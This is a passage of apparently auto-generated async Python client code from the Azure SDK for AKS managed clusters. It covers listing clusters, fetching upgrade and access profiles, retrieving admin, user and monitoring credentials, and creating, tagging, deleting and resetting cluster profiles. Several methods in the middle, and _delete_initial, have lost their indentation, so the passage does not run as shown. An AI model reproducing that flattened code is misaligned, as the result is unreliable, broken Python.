            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            # Fetch one page; anything other than HTTP 200 is raised.
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.ContainerService/managedClusters'}  # type: ignore
    @distributed_trace
    def list_by_resource_group(
        self,
        resource_group_name: str,
        **kwargs: Any
    ) -> AsyncIterable["_models.ManagedClusterListResult"]:
        """Lists managed clusters in the specified subscription and resource group.

        Lists managed clusters in the specified subscription and resource group. The operation returns
        properties of each managed cluster. Pages are fetched lazily as the
        returned iterator is consumed.

        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ManagedClusterListResult or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedClusterListResult"]
        # Map well-known HTTP error codes to exceptions; callers may extend
        # this via the ``error_map`` keyword argument.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))

        def prepare_request(next_link=None):
            # First page uses the operation's template URL; subsequent pages
            # re-issue a GET against the service-provided next_link.
            if not next_link:
                request = build_list_by_resource_group_request(
                    subscription_id=self._config.subscription_id,
                    resource_group_name=resource_group_name,
                    template_url=self.list_by_resource_group.metadata['url'],
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                request = build_list_by_resource_group_request(
                    subscription_id=self._config.subscription_id,
                    resource_group_name=resource_group_name,
                    template_url=next_link,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request

        async def extract_data(pipeline_response):
            # Deserialize one page and return (next_link, items) for paging.
            deserialized = self._deserialize("ManagedClusterListResult", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)

        async def get_next(next_link=None):
            # Fetch one page; anything other than HTTP 200 is raised.
            request = prepare_request(next_link)

            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)

            return pipeline_response

        return AsyncItemPaged(
            get_next, extract_data
        )
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters'}  # type: ignore
@distributed_trace_async
async def get_upgrade_profile(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.ManagedClusterUpgradeProfile":
"""Gets upgrade profile for a managed cluster.
Gets the details of the upgrade profile for a managed cluster with a specified resource group
and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedClusterUpgradeProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterUpgradeProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedClusterUpgradeProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_upgrade_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get_upgrade_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedClusterUpgradeProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_upgrade_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/upgradeProfiles/default'} # type: ignore
@distributed_trace_async
async def get_access_profile(
self,
resource_group_name: str,
resource_name: str,
role_name: str,
**kwargs: Any
) -> "_models.ManagedClusterAccessProfile":
"""Gets an access profile of a managed cluster.
Gets the accessProfile for the specified role name of the managed cluster with a specified
resource group and name. **WARNING**\ : This API will be deprecated. Instead use
`ListClusterUserCredentials
<https://docs.microsoft.com/en-us/rest/api/aks/managedclusters/listclusterusercredentials>`_ or
`ListClusterAdminCredentials
<https://docs.microsoft.com/en-us/rest/api/aks/managedclusters/listclusteradmincredentials>`_ .
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:param role_name: The name of the role for managed cluster accessProfile resource.
:type role_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedClusterAccessProfile, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterAccessProfile
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedClusterAccessProfile"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_access_profile_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
role_name=role_name,
template_url=self.get_access_profile.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedClusterAccessProfile', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_access_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/accessProfiles/{roleName}/listCredential'} # type: ignore
@distributed_trace_async
async def list_cluster_admin_credentials(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.CredentialResults":
"""Gets cluster admin credential of a managed cluster.
Gets cluster admin credential of the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CredentialResults, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.CredentialResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CredentialResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_cluster_admin_credentials_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_cluster_admin_credentials.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CredentialResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_cluster_admin_credentials.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/listClusterAdminCredential'} # type: ignore
@distributed_trace_async
async def list_cluster_user_credentials(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.CredentialResults":
"""Gets cluster user credential of a managed cluster.
Gets cluster user credential of the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CredentialResults, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.CredentialResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CredentialResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_cluster_user_credentials_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_cluster_user_credentials.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CredentialResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_cluster_user_credentials.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/listClusterUserCredential'} # type: ignore
@distributed_trace_async
async def list_cluster_monitoring_user_credentials(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.CredentialResults":
"""Gets cluster monitoring user credential of a managed cluster.
Gets cluster monitoring user credential of the managed cluster with a specified resource group
and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: CredentialResults, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.CredentialResults
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.CredentialResults"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_cluster_monitoring_user_credentials_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.list_cluster_monitoring_user_credentials.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('CredentialResults', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_cluster_monitoring_user_credentials.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/listClusterMonitoringUserCredential'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> "_models.ManagedCluster":
"""Gets a managed cluster.
Gets the details of the managed cluster with a specified resource group and name.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param resource_name: The name of the managed cluster resource.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagedCluster, or the result of cls(response)
:rtype: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagedCluster"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagedCluster', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
    async def _create_or_update_initial(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.ManagedCluster",
        **kwargs: Any
    ) -> "_models.ManagedCluster":
        """Issue the initial request of the create-or-update LRO and return the
        immediately deserialized ManagedCluster body.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedCluster"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Caller-supplied entries override the defaults above.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        # Serialize the ManagedCluster model into the request body.
        _json = self._serialize.body(parameters, 'ManagedCluster')
        request = build_create_or_update_request_initial(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            resource_name=resource_name,
            content_type=content_type,
            json=_json,
            template_url=self._create_or_update_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Both accepted statuses (200 and 201) carry a ManagedCluster body.
        if response.status_code == 200:
            deserialized = self._deserialize('ManagedCluster', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('ManagedCluster', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'}  # type: ignore
    @distributed_trace_async
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.ManagedCluster",
        **kwargs: Any
    ) -> AsyncLROPoller["_models.ManagedCluster"]:
        """Creates or updates a managed cluster.
        Creates or updates a managed cluster with the specified configuration for agents and Kubernetes
        version.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param resource_name: The name of the managed cluster resource.
        :type resource_name: str
        :param parameters: Parameters supplied to the Create or Update a Managed Cluster operation.
        :type parameters: ~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either ManagedCluster or the result of
         cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop LRO-control options so only transport kwargs flow to the pipeline.
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedCluster"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, issue the initial request now.
        if cont_token is None:
            raw_result = await self._create_or_update_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                parameters=parameters,
                content_type=content_type,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Drop error_map so it is not forwarded to the polling method below.
        kwargs.pop('error_map', None)
        # Builds the final ManagedCluster from the terminal polling response.
        def get_long_running_output(pipeline_response):
            response = pipeline_response.http_response
            deserialized = self._deserialize('ManagedCluster', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        # polling: True -> default ARM poller, False -> no polling, else custom.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        # Resume a previously started operation from its saved state.
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'}  # type: ignore
    async def _update_tags_initial(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.TagsObject",
        **kwargs: Any
    ) -> "_models.ManagedCluster":
        """Issue the initial request of the update-tags LRO and return the
        deserialized ManagedCluster body.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedCluster"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Caller-supplied entries override the defaults above.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        # Serialize the tags payload into the request body.
        _json = self._serialize.body(parameters, 'TagsObject')
        request = build_update_tags_request_initial(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            resource_name=resource_name,
            content_type=content_type,
            json=_json,
            template_url=self._update_tags_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('ManagedCluster', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'}  # type: ignore
    @distributed_trace_async
    async def begin_update_tags(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.TagsObject",
        **kwargs: Any
    ) -> AsyncLROPoller["_models.ManagedCluster"]:
        """Updates tags on a managed cluster.
        Updates a managed cluster with the specified tags.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param resource_name: The name of the managed cluster resource.
        :type resource_name: str
        :param parameters: Parameters supplied to the Update Managed Cluster Tags operation.
        :type parameters: ~azure.mgmt.containerservice.v2020_04_01.models.TagsObject
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either ManagedCluster or the result of
         cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.containerservice.v2020_04_01.models.ManagedCluster]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop LRO-control options so only transport kwargs flow to the pipeline.
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ManagedCluster"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, issue the initial request now.
        if cont_token is None:
            raw_result = await self._update_tags_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                parameters=parameters,
                content_type=content_type,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Drop error_map so it is not forwarded to the polling method below.
        kwargs.pop('error_map', None)
        # Builds the final ManagedCluster from the terminal polling response.
        def get_long_running_output(pipeline_response):
            response = pipeline_response.http_response
            deserialized = self._deserialize('ManagedCluster', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        # polling: True -> default ARM poller, False -> no polling, else custom.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        # Resume a previously started operation from its saved state.
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'}  # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
resource_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
resource_name=resource_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'} # type: ignore
    @distributed_trace_async
    async def begin_delete(
        self,
        resource_group_name: str,
        resource_name: str,
        **kwargs: Any
    ) -> AsyncLROPoller[None]:
        """Deletes a managed cluster.
        Deletes the managed cluster with a specified resource group and name.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param resource_name: The name of the managed cluster resource.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop LRO-control options so only transport kwargs flow to the pipeline.
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, issue the initial request now.
        if cont_token is None:
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Drop error_map so it is not forwarded to the polling method below.
        kwargs.pop('error_map', None)
        # No response body on completion; only apply the custom callback.
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        # polling: True -> default ARM poller, False -> no polling, else custom.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        # Resume a previously started operation from its saved state.
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}'}  # type: ignore
    async def _reset_service_principal_profile_initial(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.ManagedClusterServicePrincipalProfile",
        **kwargs: Any
    ) -> None:
        """Issue the initial request of the reset-service-principal-profile LRO."""
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Caller-supplied entries override the defaults above.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        # Serialize the service principal profile into the request body.
        _json = self._serialize.body(parameters, 'ManagedClusterServicePrincipalProfile')
        request = build_reset_service_principal_profile_request_initial(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
            resource_name=resource_name,
            content_type=content_type,
            json=_json,
            template_url=self._reset_service_principal_profile_initial.metadata['url'],
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # No response body is expected; only invoke the custom callback.
        if cls:
            return cls(pipeline_response, None, {})
    _reset_service_principal_profile_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetServicePrincipalProfile'}  # type: ignore
    @distributed_trace_async
    async def begin_reset_service_principal_profile(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.ManagedClusterServicePrincipalProfile",
        **kwargs: Any
    ) -> AsyncLROPoller[None]:
        """Reset Service Principal Profile of a managed cluster.
        Update the service principal Profile for a managed cluster.
        :param resource_group_name: The name of the resource group.
        :type resource_group_name: str
        :param resource_name: The name of the managed cluster resource.
        :type resource_name: str
        :param parameters: Parameters supplied to the Reset Service Principal Profile operation for a
         Managed Cluster.
        :type parameters:
         ~azure.mgmt.containerservice.v2020_04_01.models.ManagedClusterServicePrincipalProfile
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # Pop LRO-control options so only transport kwargs flow to the pipeline.
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        polling = kwargs.pop('polling', True)  # type: Union[bool, azure.core.polling.AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Without a continuation token, issue the initial request now.
        if cont_token is None:
            raw_result = await self._reset_service_principal_profile_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                parameters=parameters,
                content_type=content_type,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Drop error_map so it is not forwarded to the polling method below.
        kwargs.pop('error_map', None)
        # No response body on completion; only apply the custom callback.
        def get_long_running_output(pipeline_response):
            if cls:
                return cls(pipeline_response, None, {})
        # polling: True -> default ARM poller, False -> no polling, else custom.
        if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        # Resume a previously started operation from its saved state.
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_reset_service_principal_profile.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerService/managedClusters/{resourceName}/resetServicePrincipalProfile'}  # type: ignore
    async def _reset_aad_profile_initial(
        self,
        resource_group_name: str,
        resource_name: str,
        parameters: "_models.ManagedClusterAADProfile",
        **kwargs: Any
    ) -> None:
        """Issue the initial request of the reset-AAD-profile LRO."""
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Caller-supplied entries override the defaults above.
        error_map.update(kwargs.pop('error_map', {}))
        content_type = kwargs.pop('content_type', "application/json")  # type: Optional[str]
        # Serialize the AAD profile into the request body.
        _json = self._serialize.body(parameters, 'ManagedClusterAADProfile')
        request = build_reset_aad_profile_request_initial(
            subscription_id=self._config.subscription_id,
            resource_group_name=resource_group_name,
